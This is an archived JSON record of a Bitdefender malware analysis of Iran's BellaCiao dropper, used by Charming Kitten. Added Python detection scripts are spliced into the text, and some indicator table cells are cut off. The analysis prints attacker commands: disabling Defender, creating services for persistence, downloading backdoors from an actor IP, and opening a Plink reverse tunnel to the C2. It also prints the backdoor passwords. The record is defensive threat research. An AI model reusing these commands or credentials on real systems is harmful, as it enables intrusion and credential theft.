{
	"id": "77f9652c-65cc-46c5-9349-ae5ca1a2d238",
	"created_at": "2026-04-06T00:18:10.239296Z",
	"updated_at": "2026-04-10T03:34:00.669156Z",
	"deleted_at": null,
	"sha1_hash": "02cd613c4ee1799679e2ea94cac240aa94d85dfc",
	"title": "Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 415123,
	"plain_text": "Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware\r\nBy Martin Zugec\r\nArchived: 2026-04-05 14:18:11 UTC\r\nWith recent reports that Charming Kitten group (aka Mint Sandstorm) is actively targeting critical infrastructure in the US\r\nand other countries, we would like to share the most recent insights from Bitdefender Labs about modernization of\r\nCharming Kitten’s tactics, techniques, and procedures, including a new, previously unseen malware. This malware is\r\ntailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach\r\nwith its command-and-control (C2) infrastructure. \r\nThe name used by malware developers is BellaCiao, a reference to the Italian folk song about resistance fighting. We have\r\nidentified multiple victims in the United States and Europe, but also in the Middle East (Turkey) or India. \r\nWho is Charming Kitten?\r\nCharming Kitten (also known as APT35/Mint Sandstorm/PHOSPHORUS) is an Iranian state-sponsored APT group\r\nassociated with the Islamic Revolutionary Guard Corps (IRGC).  \r\nCharming Kitten has been on the radar of the infosec community since 2014, and was infamous for targeting political\r\ndissidents, activists, journalists, and individuals protesting oppressive regimes. While this group mostly relied on social\r\nengineering and spear phishing to achieve its goals, it was known for using sophisticated methods, including impersonation\r\nof well-known researchers or activists. 
\r\nThe modernization of Iran’s arsenal\r\nIn a speech on 17 March 2021, Ebrahim Raisi (then chief justice of Iran) declared: “The Islamic Revolutionary Guard Corps has excelled in every field it has entered both internationally and domestically, including security, defense, service provision and construction.” In August 2021, Raisi replaced the more moderate Hassan Rouhani as the president of Iran. Starting only one month after his inauguration, cyberattacks attributed to IRGC threat actors began increasing in scope, scale, and sophistication.\r\nAfter the transition of power in 2021, the IRGC and associated APT groups adopted a more aggressive and confrontational approach and demonstrated a willingness to use force to achieve their objectives. During this transitional period, Charming Kitten (and other associated groups) became more proficient in quickly weaponizing publicly disclosed PoCs. Although they required several weeks to weaponize Log4Shell in 2022, the initial attempts to exploit CVE-2022-47966 in Zoho ManageEngine were identified on the same day the PoC was made public.\r\nQuick weaponization of publicly disclosed PoCs is the “new” winning formula for both financially motivated and state-sponsored threat actors:\r\n1. Threat actors identify a remote code execution (RCE) vulnerability (preferably with a public PoC) that impacts as many companies as possible. Examples are Apache, Microsoft Exchange, VMware ESXi or the most recent vulnerability in MSMQ. Due to the sheer scale of global deployments, even if most companies patch immediately, tens of thousands of vulnerable servers remain available even years after a patch is released.\r\n2. Using automated scanners, vulnerable systems are discovered and automatically compromised (spray-and-pray tactic).\r\n3. A malicious payload (typically a webshell to enable remote administrative access) is deployed on the compromised server.\r\n4. The initial (opportunistic and fully automated) compromise is followed by a manual triage phase to determine the best approach to benefit from the attack.\r\nhttps://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/\r\nPage 1 of 6\n\nFig 1 – An example flow of hybrid attack\r\nBoth financially motivated and state-sponsored groups continue innovating and improving this approach. In our survey, 80% of US respondents (54% globally) identified software vulnerabilities as their primary concern for 2023, ahead of both ransomware and phishing attacks.\r\nOne crucial aspect of this emerging attack method is that there can be a significant time gap between the automated and manual phases. For instance, when initial access brokers are involved, a compromised server with a webshell may remain dormant until an interested buyer is found and the transaction is completed. Alternatively, threat actors may compromise more servers than they can handle, creating a backlog of compromised networks.\r\nThreat actors with lower levels of sophistication can exploit the absence of advanced detection capabilities like EDR, XDR, or MDR on compromised networks, making this tactic highly effective until such tools become more widely adopted. More sophisticated threat actors, including Charming Kitten, try to stay ahead of defenders by using custom tools to evade detection. Custom-developed (“tailored”) malware is generally harder to detect because it is crafted specifically to evade detection and contains unique code.\r\nMicrosoft recently documented two custom implants from Charming Kitten named Drokbk and Soldier, and Google previously discovered a custom data extraction tool called HYPERSCRAPE. In the next section, we analyze a new implant called BellaCiao, discovered by security researchers from Bitdefender Labs. 
\r\nBellaCiao – Truly personalized dropper\r\nDuring our investigation, we located multiple BellaCiao samples. Each sample collected was tied to a specific victim and included hardcoded information such as the company name, specially crafted subdomains, or the associated public IP address. Because all binaries are highly customized and can reveal information about victims, we are not including information such as MD5 or SHA256 hashes in this report.\r\nAll samples that we collected included .pdb paths. PDB (Program DataBase) is a file format used by Microsoft Visual Studio for storing debugging information about an executable or DLL file. We used it to extract build information for the project, including the project name and path that was configured in Visual Studio.\r\nZ:\\BellaCiao\\BellaCiao\\More Targets\\\u003cCountry\u003e\\\u003cPublic IP\u003e\\\u003cHostname\u003e\\backdoor\\MicrosoftAgentServices\\MicrosoftAgentServices\\obj\\Release\\\r\nUsing information from these files, we can learn that victims were organized in different folders by country, using folder names like IL (Israel), TR (Turkey), AT (Austria), IN (India) or IT (Italy). The original developer named this project BellaCiao, a reference to an Italian folk song that is an anthem of resistance and freedom. It is possible that the use of the name \"BellaCiao\" by Iranian hackers is a symbolic reference to their perceived struggle against the world, but this is speculative and there is no concrete evidence to support this theory. Ultimately, the true reasons behind the choice of this name may only be known to the individuals or group responsible for the malware. The \u003cPublic IP\u003e and \u003cHostname\u003e values are relevant for communication with the C2 infrastructure; we describe this process later. 
\r\nInitial infection\r\nThe exact initial infection vector is unknown, but we suspect a Microsoft Exchange exploit chain (such as ProxyShell, ProxyNotShell or OWASSRF) or a similar software vulnerability; the primary targets were Microsoft Exchange servers.\r\nUpon deployment, BellaCiao immediately attempts to disable Microsoft Defender real-time monitoring using the following PowerShell command:\r\npowershell.exe -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true\r\nPersistence\r\nA new service instance is created to establish persistence. Legitimate-sounding names specific to Microsoft Exchange Server were used to blend in, a common technique known as masquerading.\r\nsc create \"Microsoft Exchange Services Health\" binpath= \"C:\\\\ProgramData\\\\Microsoft\\\\DRMS\\\\Microsoft Exchange Services Health.exe\" start= auto\r\nsc start \"Microsoft Exchange Services Health\"\r\nsc create \"Exchange Agent Diagnostic Services\" binpath= \"C:\\\\ProgramData\\\\Microsoft\\\\Diagnostic\\\\Exchange Agent Diagnostic Services.exe\" start= auto\r\nsc start \"Microsoft Exchange Services Health\"\r\nThreat actors also attempted to download two IIS backdoors from http://188.165.174[.]199:18080.\r\nThe first one was a build of IIS-Raid, a native IIS module (MD5: 5a487c41efa2f3055d641591d601977c) downloaded from http://188.165.174[.]199:18080/index.aspx. This module inspects every IIS request, looking for pre-defined headers carrying a password and a command to execute. If the required header is not present (or the passwords do not match), the request is passed through to IIS normally, giving no indication of the backdoor. The header X-Beserver-Verify carries the password, while the header X-Forward-Verify carries the command to execute. The expected password is P@ss.XxYyTtGg@123!. 
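As an added example, not code from the Bitdefender report or from the threat actor's tooling, the following Python scans raw HTTP requests for the control headers of the IIS-Raid module described above and of the .NET credential-harvesting module described next, and shows which requests that second module would log. The header names, expected passwords and keywords are the ones this page lists; the host name mail.example.test, the sample requests and the request format are constructed assumptions.

```python
# Added example (not code from the Bitdefender report): flag HTTP requests that
# carry the control headers of the two IIS backdoors described on this page.
# Header names and passwords are the values the report lists; the sample
# requests below are constructed for illustration, not captured traffic.
from typing import Dict, List, Optional, Tuple

# (password header, command header, expected password) for each backdoor
IIS_BACKDOORS = {
    'IIS-Raid native module': ('X-Beserver-Verify', 'X-Forward-Verify', 'P@ss.XxYyTtGg@123!'),
    '.NET credential module': ('X-Verify-Request', 'X-Beserver-Pd', '01odm$kfnPAnjf'),
}
# keywords the .NET module looks for before appending a request to its .dat file
HARVEST_KEYWORDS = ('pass', 'pwd', 'password', 'login')


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    '''Split a raw HTTP request (request line followed by headers) into the
    request line and a header dict. Names are lower-cased because HTTP header
    names are case-insensitive; an operator need not type them exactly.'''
    lines = [l for l in raw.strip().splitlines() if l.strip()]
    request_line = lines[0].strip()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ':' not in line:
            continue          # body line such as a form post, not a header
        name, value = line.split(':', 1)
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def classify_request(raw: str) -> Optional[Dict[str, object]]:
    '''Return a finding if the request carries either backdoor's headers, else
    None. Presence of a control header is the signal: a wrong password makes the
    module hand the request to IIS silently, so a failed operator attempt still
    has to be flagged rather than only successful ones.'''
    request_line, headers = parse_request(raw)
    for name, (pw_header, cmd_header, expected_pw) in IIS_BACKDOORS.items():
        pw = headers.get(pw_header.lower())
        cmd = headers.get(cmd_header.lower())
        if pw is None and cmd is None:
            continue
        return {'backdoor': name, 'request': request_line,
                'password_matches': pw == expected_pw, 'command': cmd}
    return None


def would_be_harvested(raw: str) -> bool:
    '''True if the .NET module would log this request, i.e. it contains one of
    the credential keywords. Matched case-insensitively over the whole request,
    the broadest reading of the report's description.'''
    lowered = raw.lower()
    return any(k in lowered for k in HARVEST_KEYWORDS)


def scan(samples: List[str]) -> List[Dict[str, object]]:
    '''Classify every raw request and keep the findings.'''
    return [f for f in (classify_request(s) for s in samples) if f is not None]


# Constructed sample traffic against a fictitious Exchange host.
SAMPLES = [
    # operator running a command through IIS-Raid with the correct password
    '''POST /owa/auth/logon.aspx HTTP/1.1
Host: mail.example.test
X-Beserver-Verify: P@ss.XxYyTtGg@123!
X-Forward-Verify: whoami
''',
    # wrong password: IIS serves the page normally, but the header is still visible
    '''GET /owa/ HTTP/1.1
Host: mail.example.test
X-Beserver-Verify: wrong
X-Forward-Verify: hostname
''',
    # operator using the .NET module's header pair
    '''GET /aspnet_client/ HTTP/1.1
Host: mail.example.test
X-Verify-Request: 01odm$kfnPAnjf
X-Beserver-Pd: ipconfig
''',
    # ordinary OWA login, which the credential module would append to its .dat file
    '''POST /owa/auth.owa HTTP/1.1
Host: mail.example.test
Content-Type: application/x-www-form-urlencoded

username=alice&password=hunter2
''',
    # benign request
    '''GET /ecp/ HTTP/1.1
Host: mail.example.test
''',
]

if __name__ == '__main__':
    for finding in scan(SAMPLES):
        print(finding)
    print([would_be_harvested(s) for s in SAMPLES])
```

The point worth keeping from this: detection keys on the presence of the control headers, not on a password match, because a mismatched password is exactly the case in which the module lets IIS answer normally and leaves no other trace. On a real server the same check belongs in front of IIS (a reverse proxy or WAF log), since the module itself strips nothing from the request it passes through.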
\r\nThe second backdoor was a .NET IIS module for credential exfiltration (MD5: 95c6fdc4f537bccca3079d94e65bc0b0) downloaded from http://188.165.174[.]199:18080/favico.ico. This module is similar to the first one, with headers X-Verify-Request (password, expected value 01odm$kfnPAnjf) and X-Beserver-Pd (command to execute). Additionally, it looks for HTTP requests that include the keywords “pass”, “pwd”, “password”, or “login”. Any HTTP request that contains one of these words is appended to the file %LocalAppData%\\193d910f01-0293e1a6-591d103f.dat, ready for credential exfiltration.\r\nExecution\r\nThe BellaCiao executable is written to one of the following locations:\r\nC:\\ProgramData\\Microsoft\\DRMS\\Microsoft Exchange Services Health.exe\r\nC:\\ProgramData\\Microsoft\\Diagnostic\\Exchange Agent Diagnostic Services.exe\r\nC:\\Users\\Public\\Microsoft\\Diagnostic\\Microsoft Services Diagnostics Logs.exe\r\nThese executables run as a service (e.g. “Microsoft Exchange Services Health”). BellaCiao is a dropper: it is designed to deliver other malware payloads onto a victim’s system based on instructions from the C2 server. The payload delivered by BellaCiao is not downloaded but hardcoded into the executable as malformed base64 strings and dumped when requested.\r\nTo receive instructions from the C2 server, BellaCiao uses a unique approach: domain name resolution, followed by parsing of the returned IP address.\r\nA DNS request is performed every 24 hours to resolve a subdomain (a hardcoded string unique to each victim) using the following pattern:\r\n\u003c2 random uppercase letters\u003e\u003c3 random lowercase letters\u003e\u003cvictim specific subdomain\u003e.\u003cC2 domain\u003e\r\nThe BellaCiao code compares the IP address returned by a DNS server under the control of the threat actor with an IP address that has been hardcoded into the program. 
The resolved IP address resembles the real public IP address, but with slight modifications that allow BellaCiao to receive further instructions. It is important to note that BellaCiao only operates with two fixed values: a hardcoded IP string (the “local” IP, written L1.L2.L3.L4 in the examples below) and the IP address returned by the DNS server controlled by the threat actor (the “remote” IP, R1.R2.R3.R4). The code does not contain the victim’s actual public IP address; the hardcoded value only mimics its format, so that the DNS responses look like legitimate resolutions.\r\nWhen comparing these two IP addresses, there are three potential scenarios, decided by the last octet:\r\nL1.L2.L3.L4 == R1.R2.R3.(R4 - 1) – Remove all artefacts of the webshell (dropped resources and running processes)\r\nL4 == R4 – Deploy the webshell\r\nAny other value of R4 – Do nothing\r\nAfter receiving the instruction to deploy the webshell (last octet of the local IP equals that of the resolved IP), the other octets are parsed to identify the folder and filename to use.\r\nBelow is the list of octets and which aspect of webshell deployment each one controls:\r\n1. R4 (as shown above) – the operation to perform (skip, drop, or disappear)\r\n2. R3 – the folder where to deploy the webshell\r\n3. R2 – the subfolder, also depending on the value of R3\r\n4. R1 – the filename, also depending on the value of R2\r\nIf we use the Google Public DNS server address (8.8.8.8) as the hardcoded local IP, here are a few deployment scenarios (depending on the resolved IP address):\r\n8.8.8.8 - C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\owafont.aspx\r\n8.8.7.8 - c:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\r\n8.10.8.8 - C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\logont.aspx\r\n7.9.6.8 - c:\\inetpub\\wwwroot\\aspnet_client\\system_web\\\u003crandom\u003e.aspx\r\nThe dropped .aspx webshell supports 3 operations:\r\nUpload\r\nDownload\r\nCommand execution\r\nThe User-Agent string must start with a secret code (ruby@123!), followed by the requested operation, to make sure that the request is coming from the threat actors.\r\nWe also analyzed a second variant of BellaCiao that carries a different payload. This variant drops the Plink tool and a PowerShell script to hardcoded locations. The PowerShell script executes Plink to establish a reverse tunnel (a remote port forward over SSH) to the C2, which lets the threat actor interact with the PowerShell web server running on the host:\r\n\u003cPlink\u003e \u003cC2 domain\u003e -P 443 -C -R 127.0.0.1:49700:127.0.0.1:49700 -l \u003cUser\u003e -pw \u003cPassword\u003e\r\nThe PowerShell web server implements the following operations:\r\nCommand execution\r\nExecute script\r\nDownload file\r\nUpload file\r\nUpload web logs\r\nReport web server start time\r\nReport current time\r\nBeep\r\nStop web server\r\nConclusion\r\nThe best protection against modern attacks is a defense-in-depth architecture: multiple layers of security measures designed to protect against a variety of threats. The first step is to reduce the attack surface, which means limiting the number of entry points that attackers can use to gain access to your systems and promptly patching newly discovered vulnerabilities.\r\nIn addition to reducing the attack surface, it is important to implement automated protection controls that can detect and block most security incidents before they can cause any harm. Implementing IP, domain, and URL reputation is one of the most effective methods of defeating automated vulnerability exploits. According to analysis in the Data Breach Investigations Report 2022, only 0.4% of the IPs that attempted remote code execution had not been seen in a previous attack. Blocking bad IPs, domains, or URLs on all devices, including remote and work-from-home endpoints, can be highly effective.\r\nDespite your best efforts, it is still possible that some security incidents will make it past your automated prevention controls. This is where security operations and incident response come into play. A well-equipped security operations center (SOC) can monitor your systems for signs of suspicious activity and respond quickly and effectively to any security incidents that do occur. This may involve using advanced threat hunting techniques, leveraging artificial intelligence and machine learning algorithms, and coordinating with other stakeholders to minimize the impact of any security incidents. Lean on security operations, either in-house or through a managed service, and leverage strong detection and response tools. Modern threat actors often spend weeks or months doing active reconnaissance on networks, generating alerts, and relying on the absence of detection and response capabilities. 
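To make the DNS tasking mechanism from the Execution section concrete and turn the network indicators into something a SOC can run, here is an added example in Python; it is not code from the Bitdefender report. decode_tasking applies the three comparison rules between the hardcoded local IP and the resolved IP, and hunt() looks through DNS query logs for the <2 uppercase><3 lowercase><victim subdomain>.<C2 domain> beacon names, plus any query to the C2 domains from the IoC table. The victim subdomain exchange01, the client addresses and the log line format are constructed assumptions; the octet-to-path mapping beyond the four published examples is not known, so the deploy case returns the selector octets rather than a path.

```python
# Added example (not code from the Bitdefender report). decode_tasking applies the
# report's comparison rules between the hardcoded local IP and the IP returned by
# the actor-controlled DNS server; hunt() searches DNS query logs for beacon names
# <2 uppercase><3 lowercase><victim subdomain>.<C2 domain> and for any other query
# to the C2 domains in the IoC table. Victim subdomain, clients and log lines are
# constructed for illustration.
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# C2 domains from the report's IoC table, with the defanging brackets removed
C2_DOMAINS = [
    'mail-updateservice.info', 'msn-center.uk', 'msn-service.co',
    'twittsupport.com', 'mailupdate.info', 'maill-support.com',
]


def octets(ip: str) -> Tuple[int, int, int, int]:
    '''Parse a dotted quad into four ints; reject anything that is not IPv4.'''
    parts = [int(p) for p in ip.strip().split('.')]
    if len(parts) != 4 or any(p < 0 or p > 255 for p in parts):
        raise ValueError('not an IPv4 address: ' + ip)
    return parts[0], parts[1], parts[2], parts[3]


def decode_tasking(local_ip: str, resolved_ip: str) -> Dict[str, object]:
    '''Rules from the report, L = hardcoded local IP, R = resolved IP:
      R == L1.L2.L3.(L4 + 1) -> remove webshell artefacts (cleanup)
      R4 == L4               -> deploy webshell; R3, R2, R1 select folder,
                                subfolder and filename
      anything else          -> do nothing
    Only four octet-to-path combinations are published, so the deploy case
    returns the raw selector octets instead of a path.'''
    l1, l2, l3, l4 = octets(local_ip)
    r1, r2, r3, r4 = octets(resolved_ip)
    if (l1, l2, l3) == (r1, r2, r3) and r4 == l4 + 1:
        return {'action': 'cleanup'}
    if r4 == l4:
        return {'action': 'deploy', 'folder': r3, 'subfolder': r2, 'filename': r1}
    return {'action': 'noop'}


def beacon_label(qname: str, c2_domains: List[str],
                 strict_case: bool = True) -> Optional[Tuple[str, str]]:
    '''Return (victim subdomain, C2 domain) if qname matches the beacon pattern,
    else None. DNS is case-insensitive and many log pipelines lower-case names,
    so strict_case=False accepts any five letters as the random prefix (more
    false positives, fewer misses on normalised logs).'''
    for domain in c2_domains:
        suffix = '.' + domain
        if not qname.endswith(suffix):
            continue
        head = qname[:-len(suffix)]
        prefix, victim = head[:5], head[5:]
        if len(head) <= 5 or not prefix.isalpha():
            return None
        if strict_case and not (prefix[:2].isupper() and prefix[2:].islower()):
            return None
        return victim, domain
    return None


# Constructed DNS query log: <UTC timestamp> <client> <qtype> <qname>
DNS_LOG = '''
2023-04-10T09:00:03Z 10.1.2.3 A KQabcexchange01.msn-center.uk
2023-04-10T09:00:04Z 10.1.2.3 A outlook.office365.com
2023-04-11T09:00:07Z 10.1.2.3 A ZRxyzexchange01.msn-center.uk
2023-04-11T11:15:00Z 10.1.2.9 A www.msn.com
2023-04-12T09:00:02Z 10.1.2.3 A PLqweexchange01.msn-center.uk
2023-04-12T09:30:00Z 10.1.2.9 A cdn.twittsupport.com
'''


def hunt(log_text: str, c2_domains: List[str],
         strict_case: bool = True) -> List[Dict[str, object]]:
    '''Report every query to a known C2 domain; victim_label is filled in when
    the name also matches the beacon pattern, None for a plain domain hit.'''
    findings: List[Dict[str, object]] = []
    for line in log_text.strip().splitlines():
        ts, client, qtype, qname = line.split()
        qname = qname.rstrip('.')
        hit = [d for d in c2_domains if qname == d or qname.endswith('.' + d)]
        if not hit:
            continue
        label = beacon_label(qname, hit, strict_case)
        findings.append({'time': datetime.strptime(ts, '%Y-%m-%dT%H:%M:%SZ'),
                         'client': client, 'qname': qname, 'c2_domain': hit[0],
                         'victim_label': label[0] if label else None})
    return findings


def beacon_gaps_hours(findings: List[Dict[str, object]]) -> Dict[str, List[float]]:
    '''Hours between consecutive beacons per victim label: BellaCiao resolves
    once every 24 hours, so gaps near 24 corroborate a pattern match.'''
    by_label: Dict[str, List[datetime]] = {}
    for f in findings:
        if f['victim_label']:
            by_label.setdefault(str(f['victim_label']), []).append(f['time'])
    return {label: [round((b - a).total_seconds() / 3600, 2)
                    for a, b in zip(sorted(times), sorted(times)[1:])]
            for label, times in by_label.items()}
```

Calling hunt(DNS_LOG, C2_DOMAINS) on the constructed log yields three beacon hits for exchange01 from 10.1.2.3, spaced 24 hours apart, plus one plain C2-domain hit (cdn.twittsupport.com) that does not fit the beacon shape but is still an indicator. The random five-letter prefix changes on every query, which is why the hunt keys on the constant victim suffix and the C2 domain rather than on the full name; on logs that lower-case query names, run it with strict_case=False or the prefix check will miss every beacon.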
\r\nWe would like to thank Adrian Schipor, Victor Vrabie, Cristina Vatamanu, and Alexandru Maximciuc for help with putting this advisory report together.\r\nIndicators of compromise\r\nAn up-to-date and complete list of indicators of compromise is available to Bitdefender Advanced Threat Intelligence users. The currently known indicators of compromise can be found in the table below.\r\nFiles\r\nFile path: C:\\ProgramData\\Microsoft\\DRMS\\JavaUpdateServices.exe; C:\\ProgramData\\Microsoft\\Diagnostic\\MicrosoftExchangeDiagnosticServices.exe; C:\\ProgramData\\Microsoft\\Diagnostic\\MicrosoftExchangeServicesLog.exe\r\nMD5: 4812449f7fad62162ba8c4179d5d45d7\r\nDetails: Plink tool is used for\r\naddress is provided b\r\nFile path: c:\\windows\\temp\\Certificates\\envisa.exe\r\nMD5: 3fbea74b92f41809f46145f480782ef9\r\nDetails: The Plink tool used f\r\nwmic /node:127.0.0\r\n\"c:\\\\windows\\\\temp\\\r\n127.0.0.1:40455:192\r\nFile path: c:\\windows\\temp\\Certificates\\envisa.ps1\r\nMD5: -\r\nDetails: The PowerShell scrip\r\nexecutes the c:\\win\r\nwith 88.80.148[.]1\r\nFile path: C:\\ProgramData\\Microsoft\\DRMS\\JavaUpdateServices.ps1\r\nMD5: c450477ed9c347c4c3d7474e1f069f14, c6f394847eb3dc2587dc0c0130249337, 7df50cb7d4620621c2246535dd3ef10c, e7149c402a37719168fb739c62f25585\r\nDetails: The PowerShell scrip\r\nexecutes the C:\\Pro\r\ncommunicating with\r\nFile path: C:\\ProgramData\\Microsoft\\Diagnostic\\MicrosoftExchangeServicesLog.ps1\r\nMD5: 284cdf5d2b29369f0b35f3ceb363a3d1\r\nDetails: The PowerShell scrip\r\nexecutes the\r\nC:\\ProgramData\\Mic\r\ncommunicating with\r\nFile path: C:\\ProgramData\\Microsoft\\Diagnostic\\MicrosoftExchangeServicesLog.ps1\r\nMD5: 2daa29f965f661405e13b2a10d859b87\r\nDetails: The Powershell scrip\r\nexecutes the\r\nC:\\ProgramData\\M\r\nfor communicating w\r\nFile path: c:\\inetpub\\wwwroot\\aspnet_client\\system_web\\webclient.aspx; C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\logon.aspx; C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\themes.aspx; C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\owafont.aspx\r\nMD5: f56a6da833289f821dd63f902a360c31\r\nDetails: Web shell that implem\r\nNetwork\r\nDomain  Source\r\nmail-updateservice[.]info  Bitdefender research\r\nmsn-center[.]uk  Bitdefender research\r\nmsn-service[.]co  Bitdefender research\r\ntwittsupport[.]com  Bitdefender research\r\nmailupdate[.]info  Bitdefender research\r\nmaill-support[.]com  Bitdefender research\r\nIP address  Source\r\n88.80.148[.]162  Bitdefender research\r\nSource: https://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/"
	],
	"report_names": [
		"unpacking-bellaciao-a-closer-look-at-irans-latest-malware"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7",
			"created_at": "2025-08-07T02:03:24.764883Z",
			"updated_at": "2026-04-10T02:00:03.611225Z",
			"deleted_at": null,
			"main_name": "COBALT MIRAGE",
			"aliases": [
				"DEV-0270 ",
				"Nemesis Kitten ",
				"PHOSPHORUS ",
				"TunnelVision ",
				"UNC2448 "
			],
			"source_name": "Secureworks:COBALT MIRAGE",
			"tools": [
				"BitLocker",
				"Custom powershell scripts",
				"DiskCryptor",
				"Drokbk",
				"FRPC",
				"Fast Reverse Proxy (FRP)",
				"Impacket wmiexec",
				"Ngrok",
				"Plink",
				"PowerLessCLR",
				"TunnelFish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434690,
	"ts_updated_at": 1775792040,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/02cd613c4ee1799679e2ea94cac240aa94d85dfc.pdf",
		"text": "https://archive.orkl.eu/02cd613c4ee1799679e2ea94cac240aa94d85dfc.txt",
		"img": "https://archive.orkl.eu/02cd613c4ee1799679e2ea94cac240aa94d85dfc.jpg"
	}
}